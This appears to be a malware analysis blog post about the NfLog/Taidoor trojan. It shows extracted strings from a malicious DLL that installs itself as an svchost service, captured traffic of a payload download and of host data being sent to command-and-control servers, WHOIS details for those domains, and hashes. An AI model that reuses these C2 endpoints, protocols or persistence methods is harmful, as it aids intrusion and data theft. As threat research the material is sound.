100070A0: 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)',0
100070D4: 'Content-Type: application/octet-stream',0
100070FC: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*',0
10007138: 'Accept-Language: en-en',0
10007150: '%s%02x',0
1000715C: 'home.asp',0
10007168: 'index.css',0
10007174: 'index.jsp',0
10007180: 'index.php',0
1000718C: 'index.asp',0
1000719C: '/%s/%s/',0
100071A4: '%02d',0
100071AC: '%04d',0
100071B4: '%s_%s',0
100071BC: '%s:%d',0
100071C4: 'Content-Length:%d',0Dh,0Ah,0
100071D8: 'POST',0
100071E0: 'HTTP/1.1',0
100071EC: '%H:%M:%S',0
100071F8: '\*.*',0
10007210: 'Windows Infrared Port Monitor.',0
10007314: 'SvcHostDLL.exe',0
10007348: 'RegSetValueEx(ServiceDll)',0
10007364: 'ServiceDll',0
10007370: 'GetModuleFileName() get dll path',0
10007394: 'RegCreateKey(Parameters)',0
100073B0: 'Parameters',0
100073BC: 'SYSTEM\CurrentControlSet\Services\',0
100073E0: '%SystemRoot%\System32\svchost.exe -k netsvcs',0
10007410: 'OpenSCManager()',0
10007420: 'RegQueryValueEx(Svchost\netsvcs)',0
10007444: 'netsvcs',0
1000744C: 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost',0
10007484: 'WmdmPmSp',0
10007490: 'CT2.1',0
10007498: ' /c ',0
100074A0: '%ComSpec%',0
100074BC: 'Win9X',0
100074C4: 'WinNT',0
100074CC: 'Win2003',0
100074D4: 'WinXP',0
100074DC: 'Win2K',0
100074E4: 'Vista',0
100074EC: 'Unknow',0
10007974: 'Plugin_End',0
10007980: 'Plugin_Start',0
10007990: 'Plugin_Init',0
1000799C: 'Plugin_GetID',0
100079B0: ' /A /C ',0
100079B8: 'ComSpec',0
100079C8: '\IntelAMTPP.dll',0
100079DC: '\MSCDRUN.bat',0
100079EC: 'c:\Progra~1\common~1\Driver',0
10007A08: 'CommonProgramFiles',0
10007A28: ',RundllUninstall WmdmPmSp',0Dh,0Ah,0
10007A54: 'net stop WmdmPmSp',0Dh,0Ah,0


Traffic  Download pcaps here (this is approximately 24 hours of activity)

ct.datangcun.com  67.198.146.130 United States AS35908 VPLS Inc. d/b/a Krypt T VPLS Inc. d/b/a Krypt Technolog
www.mlitjcab.com 112.175.245.222 Korea, Republic of AS4766 Korea Telecom Korea Telecom
121.63.150.15   China AS4134 Chinanet CHINANET HUBEI PROVINCE NETWORK





 POST /NfLog/Nfile.asp HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)
Host: www.mlitjcab.com
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2012 04:55:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 67080
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD; path=/
Cache-control: private

67072..wMZ......................@...............................................!..L.!This program cannot be run in DOS mode.

$.......*h..n...n...n.......m.......o.......h.......o.......k.......j.......l...X/..m...n.......1+..b...1+..o...X/..c....)..o...Richn...................PE..L...._.P...........!....................................................................................................Y..
..............................................................
POST /NfLog/TTip.asp HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.mlitjcab.com
Content-Length: 8
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD

w.w.w...HTTP/1.1 200 OK
Date: Mon, 06 Aug 2012 04:55:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13
Content-Type: text/html
Cache-control: private

68.55.106.119POST /NfLog/NfStart.asp?ClientId=192.168.106.141%20<49d0>%2068.55.106.119&Nick=KH0710myk*&dtime=T:8-6-0-53 HTTP/1.1
Accept: */*
Use-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.mlitjcab.com
Content-Length: 36
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD

..............................9.9.9.HTTP/1.1 200 OK

Date: Mon, 06 Aug 2012 04:55:40 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Cache-control: private

POST /NfLog/NfHostInfo.asp?par=godata&ClientId=192.168.106.141%20<49d0>%2068.55.106.119 HTTP/1.1

Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.mlitjcab.com
Content-Length: 8601
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD

8593....C:\WINDOWS\system32\ipconfig /all


Windows IP Configuration




        Host Name . . . . . . . . . . . . : DellXT


        Primary Dns Suffix  . . . . . . . :


        Node Type . . . . . . . . . . . . : Hybrid


        IP Routing Enabled. . . . . . . . : No
       WINS Proxy Enabled. . . . . . . . : No
        DNS Suffix Search List. . . . . . : localdomain

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-50-56-3C-F6-41
        Dhcp Enabled. . . . . . . . . . . : Yes
        Autoconfiguration Enabled . . . . : Yes
       IP Address. . . . . . . . . . . . : 192.168.106.141
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.106.2
        DHCP Server . . . . . . . . . . . : 192.168.106.254
        DNS Servers . . . . . . . . . . . : 192.168.106.2
        Primary WINS Server . . . . . . . : 192.168.106.2
        Lease Obtained. . . . . . . . . . : Monday, August 06, 2012 12:50:58 AM
       Lease Expires . . . . . . . . . . : Monday, August 06, 2012 1:20:58 AM


C:\WINDOWS\system32\net start
These Windows services are started:
 Application Layer Gateway Service
 Bluetooth Support Service
 COM+ Event System
 Cryptographic Services
 DCOM Server Process Launcher
[ shortened ] --------------------

..............................9.9.9.HTTP/1.1 200 OK
Date: Mon, 06 Aug 2012 05:11:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Cache-control: private


121.63.150.15 C2 re-transmission traffic

Registration Service Provided By: SHANGHAI BEST ORAY INFORMATION S&T CO., LTD.
Contact: +86.2062219000

C&C servers

 mlitjcab.com
Registrant:
    jiaxingkeji
    jiaxingkeji       (liuhaifeng06@hotmail.com)
    haidian beijing
    haiding
    beijing,100080
    AM
    Tel. +86.1082545656
    Fax. +86.1082545656

Creation Date: 2012-07-10 10:04:37
Expiration Date: 2013-07-10 10:04:37

Domain servers in listed order:
    ns1.oray.net,ns2.oray.net

ct.datangcun.com 
port:1353

Domain name: datangcun.com
Registrant Contact:
   chj
   haha ha xjc__smallcat@sohu.com
   025-8084 fax: 025-8084
   jiangsu nanjing
   nanjing jiangsu 210046
   CN


Historical data 
Other domains registered under the same domain and their historical hosting
Some of them were C2s for Nflog over the past year or more.

liuhaifeng06@hotmail.com also registered
diaoyiku.net
thehappydoor.com
yunqizhang.net
zhuangyiku.net
daomeixiong.net
nalaner.net
boyiku.net
houdiao.net
jianyiku.net
feichaizhang.net
thehappydoor.net
saoyiku.net
maoyiku.net
embassyjp.com
seaairs.com
zhuangyiku.com
sheyiku.com
nalaner.com
saoyiku.com
diaoyiku.com
feichaizhang.com
boyiku.com
avgsafety.com
yunqizhang.com
tokyo-h0t.com
mlitjcab.com
trafficbusy.com
sheyiku.net

Hosting History
sheyiku.net
2011-05-03 New -none- 220.241.102.233
2012-05-14 Not Resolvable 220.241.102.233 -none-

trafficbusy.com
2005-12-19 New -none- 70.85.145.98
2006-01-28 Change 70.85.145.98 72.36.179.98
2006-12-13 Change 72.36.179.98 208.254.26.139
2007-03-03 Change 208.254.26.139 64.15.205.242
2007-03-10 Change 64.15.205.242 208.254.26.139
2007-11-02 Change 208.254.26.139 82.98.86.162
2008-12-22 Change 82.98.86.162 68.178.232.99
2009-02-02 Not Resolvable 68.178.232.99 -none-
2012-03-08 New -none- 84.16.228.113
2012-03-26 Change 84.16.228.113 118.140.12.50

mlitjcab.com
2012-07-11 New -none- 112.175.245.222
2012-07-13 Not Resolvable 112.175.245.222 -none-
2012-07-25 New -none- 112.175.245.222

tokyo-h0t.com
2012-07-05 New -none- 221.125.38.46

yunqizhang.com
We have no record of any IP changes.

avgsafety.com
2012-03-14 New -none- 67.198.171.67
2012-03-26 Not Resolvable 67.198.171.67 -none-


boyiku.com
2010-09-13 New -none- 127.0.0.1
2010-10-15 Not Resolvable 127.0.0.1 -none-
2011-04-10 New -none- 75.126.239.148
2012-05-14 Not Resolvable 75.126.239.148 -none-
2012-06-13 New -none- 199.59.241.216
2012-07-01 Change 199.59.241.216 199.59.241.214
2012-07-13 Change 199.59.241.214 199.59.241.207
2012-07-25 Change 199.59.241.207 199.59.241.203
2012-08-06 Change 199.59.241.203 199.59.241.188

feichaizhang.com
We have no record of any IP changes.

diaoyiku.com
2011-04-10 New -none- 75.126.219.26
2011-10-01 Change 75.126.219.26 98.126.113.27
2011-10-14 Change 98.126.113.27 174.139.232.195
2011-11-18 Change 174.139.232.195 216.83.63.147
2012-03-02 Change 216.83.63.147 174.36.84.190
2012-03-14 Change 174.36.84.190 42.208.58.126

saoyiku.com
We have no record of any IP changes.

nalaner.com
2007-03-02 New -none- 221.122.60.246
2007-05-20 Change 221.122.60.246 211.147.215.170
2008-03-02 Not Resolvable 211.147.215.170 -none-
2008-03-04 New -none- 218.5.78.85
2008-03-23 Change 218.5.78.85 209.62.72.189
2008-03-30 Not Resolvable 209.62.72.189 -none-
2008-05-06 New -none- 69.64.155.79
2008-05-11 Not Resolvable 69.64.155.79 -none-
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.111.96
2012-05-14 Not Resolvable 74.86.111.96 -none-
2012-06-17 New -none- 23.23.232.244
2012-06-20 Change 23.23.232.244 0.0.0.0

sheyiku.com
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.75.10
2011-11-29 Not Resolvable 74.86.75.10 -none-
2011-12-11 New -none- 74.86.75.10
2012-05-14 Not Resolvable 74.86.75.10 -none-

zhuangyiku.com
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.111.105
2012-05-14 Not Resolvable 74.86.111.105 -none-

seaairs.com
2012-03-08 New -none- 84.16.228.113
2012-06-08 Change 84.16.228.113 113.28.117.42
2012-07-01 Change 113.28.117.42 221.125.38.46

embassyjp.com
2008-03-30 New -none- 209.62.21.228
2008-04-06 Not Resolvable 209.62.21.228 -none-
2012-03-14 New -none- 84.16.228.113
2012-03-26 Change 84.16.228.113 27.131.32.132
2012-04-19 Change 27.131.32.132 27.131.32.128

maoyiku.net
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 75.126.194.228
2011-10-01 Change 75.126.194.228 98.126.113.27
2011-10-14 Change 98.126.113.27 174.139.232.195
2011-11-18 Change 174.139.232.195 216.83.63.147
2012-03-02 Change 216.83.63.147 174.36.84.190
2012-03-14 Change 174.36.84.190 54.235.225.45
2012-07-13 Change 54.235.225.45 174.139.132.37

saoyiku.net
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 76.73.43.158
2012-05-14 Not Resolvable 76.73.43.158 -none-

thehappydoor.net
We have no record of any IP changes.

feichaizhang.net
We have no record of any IP changes.

jianyiku.net
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.111.103
2011-10-01 Not Resolvable 74.86.111.103 -none-
2011-11-06 New -none- 216.83.41.85
2011-11-18 Change 216.83.41.85 216.83.63.155
2011-12-22 Not Resolvable 216.83.63.155 -none-
2012-01-03 New -none- 216.83.63.155
2012-05-14 Not Resolvable 216.83.63.155 -none-

houdiao.net
2011-04-10 New -none- 174.139.250.234
2012-05-14 Not Resolvable 174.139.250.234 -none-

boyiku.net
2011-04-10 New -none- 76.73.43.158
2011-04-21 Change 76.73.43.158 220.241.102.233
2011-09-05 Not Resolvable 220.241.102.233 -none-
2011-09-18 New -none- 220.241.102.233
2012-05-14 Not Resolvable 220.241.102.233 -none-

nalaner.net
We have no record of any IP changes.

daomeixiong.net
2009-09-24 New -none- 97.74.178.59
2009-12-24 Change 97.74.178.59 97.74.207.59
2010-04-01 Change 97.74.207.59 97.74.95.91
2010-04-24 Change 97.74.95.91 98.126.2.148
2010-05-14 Change 98.126.2.148 98.126.40.36
2010-09-03 Change 98.126.40.36 98.126.2.148
2010-09-13 Change 98.126.2.148 183.99.121.199
2010-10-15 Change 183.99.121.199 183.99.121.124
2010-11-06 Not Resolvable 183.99.121.124 -none-
2011-04-10 New -none- 174.139.250.234
2012-05-14 Not Resolvable 174.139.250.234 -none-
2012-06-20 New -none- 68.178.232.100

zhuangyiku.net
We have no record of any IP changes.

yunqizhang.net
We have no record of any IP changes.


#3                                                                 



Clean decoy set.xls: 
Payload ews.exe:  63d7ad4f9a5e8ede0218bad6e8d5c2e6  dropper for Trojan Taidoor (see Contagio for the same trojan)
SSDeep 3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/nGpOiz3EX:dbL6vr7ZtpxBbi636Ls0b6P4O4K
7A0D5BB0CA9992826BAD0B2241C4992B

File: ews.exe Size: 12800 MD5:  63D7AD4F9A5E8EDE0218BAD6E8D5C2E6

No comments:

Post a Comment